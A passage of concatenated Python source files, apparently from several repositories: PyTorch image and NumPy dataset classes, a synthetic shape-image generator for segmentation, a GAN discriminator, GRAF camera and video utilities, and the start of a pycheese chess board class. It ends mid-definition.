sample_dir (str): The directory of the sample files.
target_dir (str): The directory of the target files.
transform (call): Sample transforms (see `torchvision.transforms`).
target_transform (call): Target transforms (see `torchvision.transforms`).
shared_transform (call): Shared transforms for sample and target
(see `torchvision.transforms`).
share_transform_random_seed (bool): States if the shared transforms shall
share their seed. If this is deactivated
then other datasets such as
`torchvision.datasets.ImageFolder`
should be used.
return_untransformed_sample (bool): States if instead of an (input, target)
tuple an (input, sample, target) tuple
shall be returned. Here an extra
untransformed sample is also returned.
"""
def __init__(
self,
sample_dir: str,
target_dir: str,
transform: Optional[Callable] = None,
target_transform: Optional[Callable] = None,
shared_transform: Optional[Callable] = None,
share_transform_random_seed: bool = True,
return_untransformed_sample: bool = True,
sample_format: str = ".png",
target_format: str = ".png",
**kwargs
) -> None:
args = locals()
del args["self"]
del args["__class__"]
super().__init__(**args)
def load(self, path: str) -> Image:
return Image.open(path).convert("RGB")
class SharedTransformNumpyDataset(SharedTransformDataset):
"""The SharedTransformNumpyDataset class.
This describes a dataset that loads files from sample and target
directories, computes sample, target and even shared transforms
and later returns the data points as tuples.
Note:
1) If shared transforms between samples and targets aren't needed
then it is advised to use different dataset classes.
2) The samples and targets should have the basic shape of [..., H, W, C].
This is meant to encourage compatibility with the conversion transforms
of `torchvision.transforms`. Yet this is not required and can be configured
freely. ;)
Attrs:
sample_dir (str): The directory of the sample files.
target_dir (str): The directory of the target files.
transform (call): Sample transforms (see `torchvision.transforms`).
target_transform (call): Target transforms (see `torchvision.transforms`).
shared_transform (call): Shared transforms for sample and target
(see `torchvision.transforms`).
share_transform_random_seed (bool): States if the shared transforms shall
share their seed. If this is deactivated
then other datasets such as
`torchvision.datasets.ImageFolder`
should be used.
return_untransformed_sample (bool): States if instead of an (input, target)
tuple an (input, sample, target) tuple
shall be returned. Here an extra
untransformed sample is also returned.
"""
def __init__(
self,
sample_dir: str,
target_dir: str,
transform: Optional[Callable] = None,
target_transform: Optional[Callable] = None,
shared_transform: Optional[Callable] = None,
share_transform_random_seed: bool = True,
return_untransformed_sample: bool = True,
sample_format: str = ".npy",
target_format: str = ".npy",
**kwargs
) -> None:
args = locals()
del args["self"]
del args["__class__"]
super().__init__(**args)
def load(self, path: str) -> np.ndarray:
return np.load(path)
```
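To make the shared-seed mechanism above concrete, here is a hedged usage sketch that applies the same random crop to sample and target while converting each side to a tensor separately. The directory paths are hypothetical, and it assumes `list_dataset_files` pairs sample and target files by name.
```python
# Hypothetical usage sketch; paths and transform choices are assumptions.
from torch.utils.data import DataLoader
from torchvision import transforms

dataset = SharedTransformImageDataset(
    sample_dir="data/input",                      # assumed directory of paired .png files
    target_dir="data/target",
    shared_transform=transforms.RandomCrop(96),   # same seed -> same crop for sample and target
    transform=transforms.ToTensor(),
    target_transform=transforms.ToTensor(),
    return_untransformed_sample=False,
)
loader = DataLoader(dataset, batch_size=8, shuffle=True)
inputs, targets = next(iter(loader))              # crops line up between inputs and targets
```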
#### File: data/simulated/shapes.py
```python
from typing import Any
from typing import Optional
import os
import numpy as np
from matplotlib import colors
from matplotlib import patches
import matplotlib.pyplot as plt
from PIL import Image
from medicus.data.simulated.noise import generate_perlin_noise
Figure = Any
Axes = Any
COLORS = list(colors.CSS4_COLORS.keys())
def inside(
val: float,
lower_lim: float,
upper_lim: float
) -> float:
val = min(val, upper_lim)
val = max(val, lower_lim)
return val
vinside = np.vectorize(
inside, excluded=["lower_lim", "upper_lim"])
def randn(n: int, scale: float = 1.) -> np.ndarray:
normal = np.random.normal(scale=scale, size=n)
normal = vinside(normal, -1.5, 1.5)
normal = (normal + 1.5) / 3
return normal
def random_color(
class_color: Optional[str] = None
) -> str:
if class_color is None:
return np.random.choice(COLORS)
class_index = COLORS.index(class_color)
p = np.ones(len(COLORS))
p /= len(COLORS) - 1
p[class_index] = 0
return np.random.choice(COLORS, p=p)
def norm(v: np.ndarray) -> np.ndarray:
return (v - v.min()) / (v.max() - v.min())
def rectangle(
x: float,
y: float,
w: float,
h: float,
a: float,
c: float,
**kwargs
) -> patches.Rectangle:
return patches.Rectangle(
xy=(x, y),
width=w,
height=h,
angle=a,
color=c
)
def square(
x: float,
y: float,
d: float,
b: float,
c: float,
a: float,
**kwargs
) -> patches.Rectangle:
return patches.Rectangle(
xy=(x, y),
width=d,
height=d,
angle=b,
color=c,
alpha=a
)
def polygon(
xy: np.ndarray,
c: str,
a: float,
closed: bool = True,
**kwargs
) -> patches.Polygon:
return patches.Polygon(
xy=xy,
color=c,
alpha=a,
closed=closed,
)
def circle(
x: float,
y: float,
r: float,
c: str,
a: float,
**kwargs
) -> patches.Circle:
return patches.Circle(
xy=(x, y),
radius=r,
color=c,
alpha=a
)
def wedge(
x: float,
y: float,
r: float,
t1: float,
t2: float,
w: float,
c: str,
a: float,
**kwargs
) -> patches.Wedge:
return patches.Wedge(
center=(x, y),
r=r,
theta1=t1,
theta2=t2,
width=w,
color=c,
alpha=a
)
def koch_snowflake(order, scale=10):
"""
Return two lists x, y of point coordinates of the Koch snowflake.
Parameters
----------
order : int
The recursion depth.
scale : float
The extent of the snowflake (edge length of the base triangle).
source: https://matplotlib.org/stable/gallery/lines_bars_and_markers/fill.html
"""
def _koch_snowflake_complex(order):
if order == 0:
# initial triangle
angles = np.array([0, 120, 240]) + 90
return scale / np.sqrt(3) * np.exp(np.deg2rad(angles) * 1j)
else:
ZR = 0.5 - 0.5j * np.sqrt(3) / 3
p1 = _koch_snowflake_complex(order - 1) # start points
p2 = np.roll(p1, shift=-1) # end points
dp = p2 - p1 # connection vectors
new_points = np.empty(len(p1) * 4, dtype=np.complex128)
new_points[::4] = p1
new_points[1::4] = p1 + dp / 3
new_points[2::4] = p1 + dp * ZR
new_points[3::4] = p1 + dp / 3 * 2
return new_points
points = _koch_snowflake_complex(order)
x, y = points.real, points.imag
#x = norm(x)
#y = norm(y)
xy = np.zeros((len(x), 2))
xy[:, 0] = x
xy[:, 1] = y
return xy
def distance(p: np.ndarray) -> float:
return np.sqrt(p[0]**2 + p[1]**2)
vdistance = np.vectorize(distance, signature="(n)->()")
def softmax(
value: np.ndarray,
eps: float = 1.0
) -> np.ndarray:
return np.exp(value * eps) / np.sum(np.exp(value))
def add_noise(
v: float,
n: np.ndarray,
) -> np.ndarray:
i = int(v * len(n)) % len(n)
return v + n[i, i]
vadd_noise = np.vectorize(add_noise, excluded=["n"])
def random_distort(
xy: np.ndarray
) -> np.ndarray:
distances = vdistance(xy)
distances = softmax(distances, eps=np.random.rand())
x = xy[:, 0]
y = xy[:, 1]
x *= distances
y *= distances
x = norm(x)
y = norm(y)
noise = generate_perlin_noise(
height=100,
width=100,
octaves=[1, 10],
scaling=[1., .05])
noise = (noise - .5) * .2
x = vadd_noise(x, n=noise)
y = vadd_noise(y, n=noise)
x = norm(x)
y = norm(y)
xy[:, 0] = x
xy[:, 1] = y
return xy
def snowflake(
width: int,
height: int
) -> np.ndarray:
order = np.random.randint(2, 6)
snowflake = koch_snowflake(order)
snowflake = random_distort(snowflake)
scale = np.random.rand()
snowflake[:, 0] = snowflake[:, 0] * width
snowflake[:, 1] = snowflake[:, 1] * height
return snowflake
def random_gauss(
num: int = 200,
sigma: float = .5,
mu: float = 0.
) -> np.ndarray:
min_x, max_x = np.random.rand(2)
min_y, max_y = np.random.rand(2)
min_x *= -1
min_y *= -1
x = np.linspace(min_x, max_x, num)
y = np.linspace(min_y, max_y, num)
x, y = np.meshgrid(x, y)
dist = np.sqrt(x**2 + y**2)
return np.exp(-((dist - mu)**2 / ( 2.0 * sigma**2)))
def random_rect_args(
width: int,
height: int,
min_rect_scale: float,
max_rect_scale: float,
class_color: Optional[str] = None,
scale: float = 1.,
) -> dict:
x, y = randn(2, scale)
w, h = randn(2, scale)
x = x * width
y = y * height
w = inside(w, min_rect_scale, max_rect_scale)
h = inside(h, min_rect_scale, max_rect_scale)
w = w * width
h = h * height
a = 45 * randn(1)
c = random_color(class_color)
return locals()
def random_square_args(
width: int,
height: int,
min_square_scale: float = 0.1,
max_square_scale: float = 0.4,
class_color: Optional[str] = None,
scale: float = 1.,
) -> dict:
x, y = randn(2, scale)
d = np.random.rand()
d = inside(d, min_square_scale, max_square_scale)
d *= min(width, height)
b = 45 * np.random.rand()
c = random_color(class_color)
a = np.random.rand()
a = inside(a, 0.2, 0.8)
return locals()
def random_polygon_args(
width: int,
height: int,
min_polygon_scale: float = 0.1,
max_polygon_scale: float = 0.7,
min_points: int = 3,
max_points: int = 8,
class_color: Optional[str] = None,
) -> dict:
n = np.random.randint(min_points, max_points)
xy = np.random.rand(n, 2)
xy[:, 0] = xy[:, 0] * width
xy[:, 1] = xy[:, 1] * height
s = np.random.rand()
s = inside(s, min_polygon_scale, max_polygon_scale)
xy *= s
c = random_color(class_color)
a = np.random.rand()
a = inside(a, 0.2, 0.8)
return locals()
def random_circle_args(
width: int,
height: int,
min_circle_scale: float = 0.1,
max_circle_scale: float = 0.4,
class_color: Optional[str] = None,
) -> dict:
x, y = np.random.rand(2)
x *= width
y *= height
r = np.random.rand()
r = inside(r, min_circle_scale, max_circle_scale)
r *= min(width, height)
c = random_color(class_color)
a = np.random.rand()
a = inside(a, 0.2, 0.8)
return locals()
def random_wedge_args(
width: int,
height: int,
min_circle_scale: float = 0.1,
max_circle_scale: float = 0.4,
class_color: Optional[str] = None,
) -> dict:
x, y = np.random.rand(2)
x *= width
y *= height
r = np.random.rand()
r = inside(r, min_circle_scale, max_circle_scale)
r *= min(width, height)
t1 = 360. * np.random.rand()
t2 = 360. * np.random.rand()
w = np.random.rand()
w = r * w
c = random_color(class_color)
a = np.random.rand()
a = inside(a, 0.2, 0.8)
return locals()
def save_figure_axes(
fig: Figure,
axes: Axes,
file_path: str
) -> None:
extend = axes.get_window_extent(
).transformed(fig.dpi_scale_trans.inverted())
extend.x0 = 2.7364705882352944
extend.x1 = 3.823529411764706
fig.savefig(file_path, bbox_inches=extend)
def generate_rectangles_samples(
height: int,
width: int,
num_samples: int = 20,
num_rects: int = 20,
class_color: str = "red",
min_rect_scale: float = 0.1,
max_rect_scale: float = 0.4,
directory: str = ".",
file_prefix: str = "rectangles",
file_type: str = "png",
seed: int = None
) -> None:
assert class_color in COLORS
if seed:
np.random.seed(seed)
inp_background = np.ones((height, width, 3))
tgt_background = np.zeros((height, width, 1))
args = (
width,
height,
min_rect_scale,
max_rect_scale,
class_color
)
os.makedirs(os.path.join(directory, "input"), exist_ok=True)
os.makedirs(os.path.join(directory, "target"), exist_ok=True)
for i in range(num_samples):
fig, (inp, tgt) = plt.subplots(2)
inp.imshow(inp_background)
tgt.imshow(tgt_background)
for j in range(num_rects - 1):
patch = rectangle(
**random_rect_args(*args))
inp.add_patch(patch)
rect_args = random_rect_args(*args, scale=0.5)
inp_rect_args = {**rect_args, **{"c": class_color}}
tgt_rect_args = {**rect_args, **{"c": "white"}}
inp.add_patch(rectangle(**inp_rect_args))
tgt.add_patch(rectangle(**tgt_rect_args))
inp_path = os.path.join(directory, "input", f"{file_prefix}_{i}.{file_type}")
tgt_path = os.path.join(directory, "target", f"{file_prefix}_{i}.{file_type}")
save_figure_axes(fig, inp, inp_path)
save_figure_axes(fig, tgt, tgt_path)
plt.close()
"""
generate_rectangles_samples(
height=108,
width=108,
num_samples=10_000,
directory=os.path.join(
"medicus", "data", "simulated", ".rectangles", "train"
),
seed=0
)
generate_rectangles_samples(
height=108,
width=108,
num_samples=2_000,
directory=os.path.join(
"medicus", "data", "simulated", ".rectangles", "test"
),
seed=10_000
)
generate_rectangles_samples(
height=108,
width=108,
num_samples=200,
directory=os.path.join(
"medicus", "data", "simulated", ".rectangles", "eval"
),
seed=12_000
)
"""
shapes_mapping = {
"square": {
"args": random_square_args,
"func": square
},
"polygon": {
"args": random_polygon_args,
"func": polygon
},
"circle": {
"args": random_circle_args,
"func": circle
},
"wedge": {
"args": random_wedge_args,
"func": wedge
}
}
def generate_shapes_samples(
height: int,
width: int,
num_samples: int,
num_shapes: int = 20,
class_shape: str = "square",
directory: str = ".",
file_prefix: str = "shapes",
file_type: str = "png",
seed: int = None
) -> None:
if seed:
np.random.seed(seed)
inp_background = np.ones((height, width, 3))
tgt_background = np.zeros((height, width, 1))
os.makedirs(os.path.join(directory, "input"), exist_ok=True)
os.makedirs(os.path.join(directory, "target"), exist_ok=True)
other_shapes = list(shapes_mapping.keys())
other_shapes.remove(class_shape)
for i in range(num_samples):
fig, (_, inp, tgt) = plt.subplots(3)
_.imshow(inp_background)
inp.imshow(inp_background)
tgt.imshow(tgt_background)
for j in range(num_shapes - 1):
shape = np.random.choice(other_shapes)
args = shapes_mapping[shape]["args"]
func = shapes_mapping[shape]["func"]
args = args(width, height)
shape = func(**args)
inp.add_patch(shape)
args = shapes_mapping[class_shape]["args"]
func = shapes_mapping[class_shape]["func"]
args = args(width, height)
inp_args = {**args, "a": inside(args["a"], .6, 1.)}
tgt_args = {**args, "c": "white", "a": None}
inp.add_patch(func(**inp_args))
tgt.add_patch(func(**tgt_args))
inp_path = os.path.join(directory, "input", f"{file_prefix}_{i}.{file_type}")
tgt_path = os.path.join(directory, "target", f"{file_prefix}_{i}.{file_type}")
save_figure_axes(fig, inp, inp_path)
save_figure_axes(fig, tgt, tgt_path)
plt.close()
"""
generate_shapes_samples(
height=108,
width=108,
num_samples=10_000,
directory="medicus\data\simulated\.shapes\train",
seed=0
)
generate_shapes_samples(
height=108,
width=108,
num_samples=2_000,
directory="medicus\data\simulated\.shapes\test",
seed=10_000
)
generate_shapes_samples(
height=108,
width=108,
num_samples=200,
directory="medicus\data\simulated\.shapes\eval",
seed=12_000
)
"""
def generate_snowflakes_samples(
height: int,
width: int,
num_samples: int = 20,
num_snowflakes: int = 5,
class_color: str = "red",
directory: str = ".",
file_prefix: str = "snowflakes",
file_type: str = "png",
seed: Optional[int] = None
) -> None:
if seed:
np.random.seed(seed)
inp_background = np.ones((height, width, 3))
tgt_background = np.zeros((height, width, 1))
os.makedirs(os.path.join(directory, "input"), exist_ok=True)
os.makedirs(os.path.join(directory, "target"), exist_ok=True)
for i in range(num_samples):
fig, (inp, tgt) = plt.subplots(2)
inp.imshow(inp_background)
tgt.imshow(tgt_background)
for j in range(num_snowflakes - 1):
shape = snowflake(width, height)
color = random_color(class_color)
patch = patches.Polygon(
xy=shape,
closed=True,
color=color)
inp.add_patch(patch)
shape = snowflake(width, height)
args = dict(xy=shape, closed=True)
inp_patch = patches.Polygon(**args, color=class_color)
tgt_patch = patches.Polygon(**args, color="white")
inp.add_patch(inp_patch)
tgt.add_patch(tgt_patch)
inp_path = os.path.join(directory, "input", f"{file_prefix}_{i}.{file_type}")
tgt_path = os.path.join(directory, "target", f"{file_prefix}_{i}.{file_type}")
save_figure_axes(fig, inp, inp_path)
save_figure_axes(fig, tgt, tgt_path)
plt.close()
"""
generate_snowflakes_samples(
height=108,
width=108,
num_samples=10_000,
directory="medicus\data\simulated\.snowflakes\train",
seed=0
)
generate_snowflakes_samples(
height=108,
width=108,
num_samples=2_000,
directory="medicus\data\simulated\.snowflakes\test",
seed=10_000
)
generate_snowflakes_samples(
height=108,
width=108,
num_samples=200,
directory="medicus\data\simulated\.snowflakes\eval",
seed=12_000
)
"""
def generate_gauss_samples(
dim: int,
num_samples: int = 20,
directory: str = ".",
file_prefix: str = "gauss",
file_type: str = "png",
seed: Optional[int] = None
) -> None:
if seed:
np.random.seed(seed)
os.makedirs(os.path.join(directory, "input"), exist_ok=True)
os.makedirs(os.path.join(directory, "target"), exist_ok=True)
for i in range(num_samples):
gauss = random_gauss(dim)
noise = generate_perlin_noise(
height=dim,
width=dim,
octaves=[1., 4., 10.],
scaling=[1., 1, .125])
noise = noise.reshape((dim, dim))
noise = norm(noise) * 0.7
gauss = softmax(gauss)
gauss = norm(gauss)
inp_img = gauss * .7 + noise * .3
tgt_img = gauss > .92
inp_img = inp_img - .05 * (tgt_img < .5)
# Convert to uint8 so PIL can construct images from the arrays.
inp_img = (inp_img * 255).astype(np.uint8)
tgt_img = (tgt_img * 255).astype(np.uint8)
inp_path = os.path.join(directory, "input", f"{file_prefix}_{i}.{file_type}")
tgt_path = os.path.join(directory, "target", f"{file_prefix}_{i}.{file_type}")
Image.fromarray(inp_img).convert("RGB").save(inp_path)
Image.fromarray(tgt_img).convert("RGB").save(tgt_path)
generate_gauss_samples(
dim=108,
num_samples=10_000,
directory=os.path.join(
"medicus", "data", "simulated", ".gaussians", "train"
),
seed=0)
generate_gauss_samples(
dim=108,
num_samples=2_000,
directory=os.path.join(
"medicus", "data", "simulated", ".gaussians", "test"
),
seed=10_000)
generate_gauss_samples(
dim=108,
num_samples=200,
directory=os.path.join(
"medicus", "data", "simulated", ".gaussians", "eval"
),
seed=12_000)
``` |
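Mirroring the commented-out calls above, a small smoke-test sized invocation of the shape generator could look as follows; the output directory is a placeholder.
```python
# Small-scale sketch of the generators above; the directory is a placeholder.
import os

generate_shapes_samples(
    height=108,
    width=108,
    num_samples=4,                    # keep it tiny for a smoke test
    class_shape="circle",             # segment circles instead of the default squares
    directory=os.path.join(".shapes_demo", "train"),
    seed=0,
)
# Afterwards .shapes_demo/train/input and .shapes_demo/train/target each hold 4 PNGs.
```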
{
"source": "1ucky40nc3/mednerf",
"score": 2
} |
#### File: graf/models/discriminator.py
```python
import torch
import torch.nn as nn
from torch.nn.utils import spectral_norm
import torch.nn.functional as F
import random
def conv2d(*args, **kwargs):
return spectral_norm(nn.Conv2d(*args, **kwargs))
def batchNorm2d(*args, **kwargs):
return nn.BatchNorm2d(*args, **kwargs)
class Swish(nn.Module):
def forward(self, feat):
return feat * torch.sigmoid(feat)
class GLU(nn.Module):
def forward(self, x):
nc = x.size(1)
assert nc % 2 == 0, "channels don't divide by 2!"
nc = int(nc/2)
return x[:, :nc] * torch.sigmoid(x[:, nc:])
class DownBlockComp(nn.Module):
def __init__(self, in_planes, out_planes):
super(DownBlockComp, self).__init__()
self.main = nn.Sequential(
conv2d(in_planes, out_planes, 4, 2, 1, bias=False),
batchNorm2d(out_planes), nn.LeakyReLU(0.2, inplace=True),
conv2d(out_planes, out_planes, 3, 1, 1, bias=False),
batchNorm2d(out_planes), nn.LeakyReLU(0.2)
)
self.direct = nn.Sequential(
nn.AvgPool2d(2, 2),
conv2d(in_planes, out_planes, 1, 1, 0, bias=False),
batchNorm2d(out_planes), nn.LeakyReLU(0.2))
def forward(self, feat):
return (self.main(feat) + self.direct(feat)) / 2
class SEBlock(nn.Module):
def __init__(self, ch_in, ch_out):
super().__init__()
self.main = nn.Sequential( nn.AdaptiveAvgPool2d(4),
conv2d(ch_in, ch_out, 4, 1, 0, bias=False), Swish(),
conv2d(ch_out, ch_out, 1, 1, 0, bias=False), nn.Sigmoid() )
def forward(self, feat_small, feat_big):
return feat_big * self.main(feat_small)
class DownBlock(nn.Module):
def __init__(self, in_planes, out_planes):
super(DownBlock, self).__init__()
self.main = nn.Sequential(
conv2d(in_planes, out_planes, 4, 2, 1, bias=False),
batchNorm2d(out_planes), nn.LeakyReLU(0.2, inplace=True),
)
def forward(self, feat):
return self.main(feat)
class SimpleDecoder(nn.Module):
"""docstring for CAN_SimpleDecoder"""
def __init__(self, nfc_in=64, nc=3):
super(SimpleDecoder, self).__init__()
nfc_multi = {4:16, 8:8, 16:4, 32:2, 64:2, 128:1, 256:0.5, 512:0.25, 1024:0.125}
nfc = {}
for k, v in nfc_multi.items():
nfc[k] = int(v*32)
def upBlock(in_planes, out_planes):
block = nn.Sequential(
nn.Upsample(scale_factor=2, mode='nearest'),
conv2d(in_planes, out_planes*2, 3, 1, 1, bias=False),
batchNorm2d(out_planes*2), GLU())
return block
self.main = nn.Sequential( nn.AdaptiveAvgPool2d(8),
upBlock(nfc_in, nfc[16]),
upBlock(nfc[16], nfc[32]),
upBlock(nfc[32], nfc[64]),
upBlock(nfc[64], nfc[128]),
conv2d(nfc[128], nc, 3, 1, 1, bias=False),
nn.Tanh() )
def forward(self, input):
# input shape: c x 4 x 4
return self.main(input)
class Discriminator(nn.Module):
def __init__(self, nc=3, ndf=64, imsize=64):
super(Discriminator, self).__init__()
self.nc = nc
assert(imsize==32 or imsize==64 or imsize==128)
self.im_size = imsize
nfc_multi = {4:16, 8:16, 16:8, 32:4, 64:2, 128:1, 256:0.5, 512:0.25, 1024:0.125}
nfc = {}
for k, v in nfc_multi.items():
nfc[k] = int(v*ndf)
self.down_from_big = nn.Sequential(
conv2d(nc, nfc[512], 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True) )
self.down_4 = DownBlockComp(nfc[512], nfc[256])
self.down_8 = DownBlockComp(nfc[256], nfc[128])
sequence = [conv2d(nfc[128] , nfc[32], 1, 1, 0, bias=False),
batchNorm2d(nfc[32]),
nn.LeakyReLU(0.2, inplace=True)]
self.dag_heads = []
for i in range(4):
head = sequence + [conv2d(nfc[32], 1, 4, 1, 0, bias=False)]
self.dag_heads.append(nn.Sequential(*head))
self.dag_heads = nn.ModuleList(self.dag_heads)
self.se_2_16 = SEBlock(nfc[512], nfc[256])
self.se_4_32 = SEBlock(nfc[256], nfc[128])
self.decoder_big = SimpleDecoder(nfc[128], nc)
self.decoder_part = SimpleDecoder(nfc[256], nc)
def forward(self, input, y=None):
feat_2 = self.down_from_big(input)
feat_4 = self.down_4(feat_2)
feat_16 = self.se_2_16(feat_2, feat_4)
feat_8 = self.down_8(feat_16)
feat_last = self.se_4_32(feat_4, feat_8)
dag_outputs = []
for i in range(4):
dag_outputs.append(self.dag_heads[i](feat_last).view(-1))
if y[0] == 1:
rec_img_big = self.decoder_big(feat_last)
part = random.randint(0, 3)
rec_img_part = None
if part==0:
rec_img_part = self.decoder_part(feat_16[:,:,:8,:8])
if part==1:
rec_img_part = self.decoder_part(feat_16[:,:,:8,8:])
if part==2:
rec_img_part = self.decoder_part(feat_16[:,:,8:,:8])
if part==3:
rec_img_part = self.decoder_part(feat_16[:,:,8:,8:])
return dag_outputs, [rec_img_big, rec_img_part], part, input
return dag_outputs
```
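A short, hedged sketch of how this two-branch discriminator could be exercised; the batch size is arbitrary, and `y=[1]` follows the flag check in `forward` that switches on the auxiliary reconstruction decoders.
```python
# Illustrative forward pass; tensor sizes follow the module definitions above.
import torch

disc = Discriminator(nc=3, ndf=64, imsize=64)
images = torch.randn(4, 3, 64, 64)

# y[0] == 1 enables the self-supervised reconstruction branch.
logits, (rec_full, rec_part), part, _ = disc(images, y=[1])
print([l.shape for l in logits])       # four DAG head outputs, each flattened
print(rec_full.shape, rec_part.shape, part)

# Any other flag skips the decoders and returns only the DAG head outputs.
logits_only = disc(images, y=[0])
```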
#### File: graf-main/graf/utils.py
```python
import numpy as np
import torch
import imageio
import os
import torch.utils.data as data
def InfiniteSampler(n):
"""Data sampler"""
i = n - 1
order = np.random.permutation(n)
while True:
yield order[i]
i += 1
if i >= n:
np.random.seed()
order = np.random.permutation(n)
i = 0
class InfiniteSamplerWrapper(data.sampler.Sampler):
"""Data sampler wrapper"""
def __init__(self, data_source):
self.num_samples = len(data_source)
def __iter__(self):
return iter(InfiniteSampler(self.num_samples))
def __len__(self):
return 2 ** 15
def get_nsamples(data_loader, N):
x = []
n = 0
while n < N:
x_next = next(data_loader)
x_next = x_next.cuda(non_blocking=True)
x.append(x_next)
n += x_next.size(0)
x = torch.cat(x, dim=0)[:N]
return x
def count_trainable_parameters(model):
model_parameters = filter(lambda p: p.requires_grad, model.parameters())
return sum([np.prod(p.size()) for p in model_parameters])
def save_video(imgs, fname, as_gif=False, fps=24, quality=8):
# convert to np.uint8
imgs = (255 * np.clip(imgs.permute(0, 2, 3, 1).detach().cpu().numpy() / 2 + 0.5, 0, 1)).astype(np.uint8)
imageio.mimwrite(fname, imgs, fps=fps, quality=quality)
if as_gif: # save as gif, too
os.system(f'ffmpeg -i {fname} -r 15 '
f'-vf "scale=512:-1,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse" {os.path.splitext(fname)[0] + ".gif"}')
def color_depth_map(depths, scale=None):
"""
Color an input depth map.
Arguments:
depths -- HxW numpy array of depths
[scale=None] -- scaling the values (defaults to the maximum depth)
Returns:
colored_depths -- HxWx3 numpy array visualizing the depths
"""
_color_map_depths = np.array([
[0, 0, 0], # 0.000
[0, 0, 255], # 0.114
[255, 0, 0], # 0.299
[255, 0, 255], # 0.413
[0, 255, 0], # 0.587
[0, 255, 255], # 0.701
[255, 255, 0], # 0.886
[255, 255, 255], # 1.000
[255, 255, 255], # 1.000
]).astype(float)
_color_map_bincenters = np.array([
0.0,
0.114,
0.299,
0.413,
0.587,
0.701,
0.886,
1.000,
2.000, # doesn't make a difference, just strictly higher than 1
])
if scale is None:
scale = depths.max()
values = np.clip(depths.flatten() / scale, 0, 1)
# for each value, figure out where they fit in in the bincenters: what is the last bincenter smaller than this value?
lower_bin = ((values.reshape(-1, 1) >= _color_map_bincenters.reshape(1, -1)) * np.arange(0, 9)).max(axis=1)
lower_bin_value = _color_map_bincenters[lower_bin]
higher_bin_value = _color_map_bincenters[lower_bin + 1]
alphas = (values - lower_bin_value) / (higher_bin_value - lower_bin_value)
colors = _color_map_depths[lower_bin] * (1 - alphas).reshape(-1, 1) + _color_map_depths[
lower_bin + 1] * alphas.reshape(-1, 1)
return colors.reshape(depths.shape[0], depths.shape[1], 3).astype(np.uint8)
# Virtual camera utils
def to_sphere(u, v):
theta = 2 * np.pi * u
phi = np.arccos(1 - 2 * v)
cx = np.sin(phi) * np.cos(theta)
cy = np.sin(phi) * np.sin(theta)
cz = np.cos(phi)
s = np.stack([cx, cy, cz])
return s
def polar_to_cartesian(r, theta, phi, deg=True):
if deg:
phi = phi * np.pi / 180
theta = theta * np.pi / 180
cx = np.sin(phi) * np.cos(theta)
cy = np.sin(phi) * np.sin(theta)
cz = np.cos(phi)
return r * np.stack([cx, cy, cz])
def to_uv(loc):
# normalize to unit sphere
loc = loc / loc.norm(dim=1, keepdim=True)
cx, cy, cz = loc.t()
v = (1 - cz) / 2
phi = torch.acos(cz)
sin_phi = torch.sin(phi)
# ensure we do not divide by zero
eps = 1e-8
sin_phi[sin_phi.abs() < eps] = eps
theta = torch.acos(cx / sin_phi)
# check for sign of phi
cx_rec = sin_phi * torch.cos(theta)
if not np.isclose(cx.numpy(), cx_rec.numpy(), atol=1e-5).all():
sin_phi = -sin_phi
# check for sign of theta
cy_rec = sin_phi * torch.sin(theta)
if not np.isclose(cy.numpy(), cy_rec.numpy(), atol=1e-5).all():
theta = -theta
u = theta / (2 * np.pi)
assert np.isclose(to_sphere(u, v).detach().cpu().numpy(), loc.t().detach().cpu().numpy(), atol=1e-5).all()
return u, v
def to_phi(u):
return 360 * u # 2*pi*u*180/pi
def to_theta(v):
return np.arccos(1 - 2 * v) * 180. / np.pi
def sample_on_sphere(range_u=(0, 1), range_v=(0, 1)):
u = np.random.uniform(*range_u)
v = np.random.uniform(*range_v)
return to_sphere(u, v)
def look_at(eye, at=np.array([0, 0, 0]), up=np.array([0, 0, 1]), eps=1e-5):
at = at.astype(float).reshape(1, 3)
up = up.astype(float).reshape(1, 3)
eye = eye.reshape(-1, 3)
up = up.repeat(eye.shape[0] // up.shape[0], axis=0)
eps = np.array([eps]).reshape(1, 1).repeat(up.shape[0], axis=0)
z_axis = eye - at
z_axis /= np.max(np.stack([np.linalg.norm(z_axis, axis=1, keepdims=True), eps]))
x_axis = np.cross(up, z_axis)
x_axis /= np.max(np.stack([np.linalg.norm(x_axis, axis=1, keepdims=True), eps]))
y_axis = np.cross(z_axis, x_axis)
y_axis /= np.max(np.stack([np.linalg.norm(y_axis, axis=1, keepdims=True), eps]))
r_mat = np.concatenate((x_axis.reshape(-1, 3, 1), y_axis.reshape(-1, 3, 1), z_axis.reshape(-1, 3, 1)), axis=2)
return r_mat
``` |
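To make the virtual-camera helpers at the end concrete, here is a hedged sketch that samples a viewpoint on the upper hemisphere, scales it to a radius, and assembles a camera-to-world pose with `look_at`; the radius is an arbitrary choice.
```python
# Illustrative use of the pose utilities; the radius is an arbitrary choice.
import numpy as np

radius = 4.0
eye = radius * sample_on_sphere(range_u=(0, 1), range_v=(0, 0.5))  # upper hemisphere
rotation = look_at(eye)[0]          # 3x3 rotation whose columns are the camera axes

pose = np.eye(4)                    # homogeneous camera-to-world matrix
pose[:3, :3] = rotation
pose[:3, 3] = eye
print(pose)
```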
{
"source": "1ucky40nc3/pycheese",
"score": 3
} |
#### File: pycheese/core/board.py
```python
from __future__ import annotations
import copy
from typing import Optional
from pycheese.core.entity import Entity
from pycheese.core.entity import Empty
from pycheese.core.entity import Piece
from pycheese.core.entity import Pawn
from pycheese.core.entity import Knight
from pycheese.core.entity import Bishop
from pycheese.core.entity import Rook
from pycheese.core.entity import Queen
from pycheese.core.entity import King
from pycheese.core.utils import Boundary
from pycheese.core.utils import coord_to_dict
from pycheese.core.utils import dict_to_coord
from pycheese.core.utils import normalize
from pycheese.core.error import NotInPlayersPossesionException
from pycheese.core.error import NoPieceAtSpecifiedCoordinateException
from pycheese.core.error import MoveNotLegalException
from pycheese.core.error import NotWhitelistedException
class Board:
"""Object-oriented representation of a chess board.
Args:
json (dict): A JSON representation of an objects this class produces.
Attributes:
state (str): State of the game (`ongoing`/`check`/`checkmate`/`stalemate`/`draw`).
player (str): String that identifies the player whose turn it is.
board (`list` of `list` of `Entity`): list representing the board.
"""
def __init__(self, json: Optional[dict] = None):
self.state = "ongoing"
self.player = "white"
self.last = {}
self.board = []
self.init(json)
def set(self, board: list[list[Entity]]) -> None:
self.board = board
def get(self) -> list[list[Entity]]:
return self.board
def init(self, json: Optional[dict]) -> None:
"""Initialize the Board classes board.
Args:
json (dict): A JSON representation of an objects this class produces.
"""
if json:
self.from_dict(json)
else:
self.set(initial_board())
self.update()
def move(self, source_coord: list[int, int],
target_coord: list[int, int],
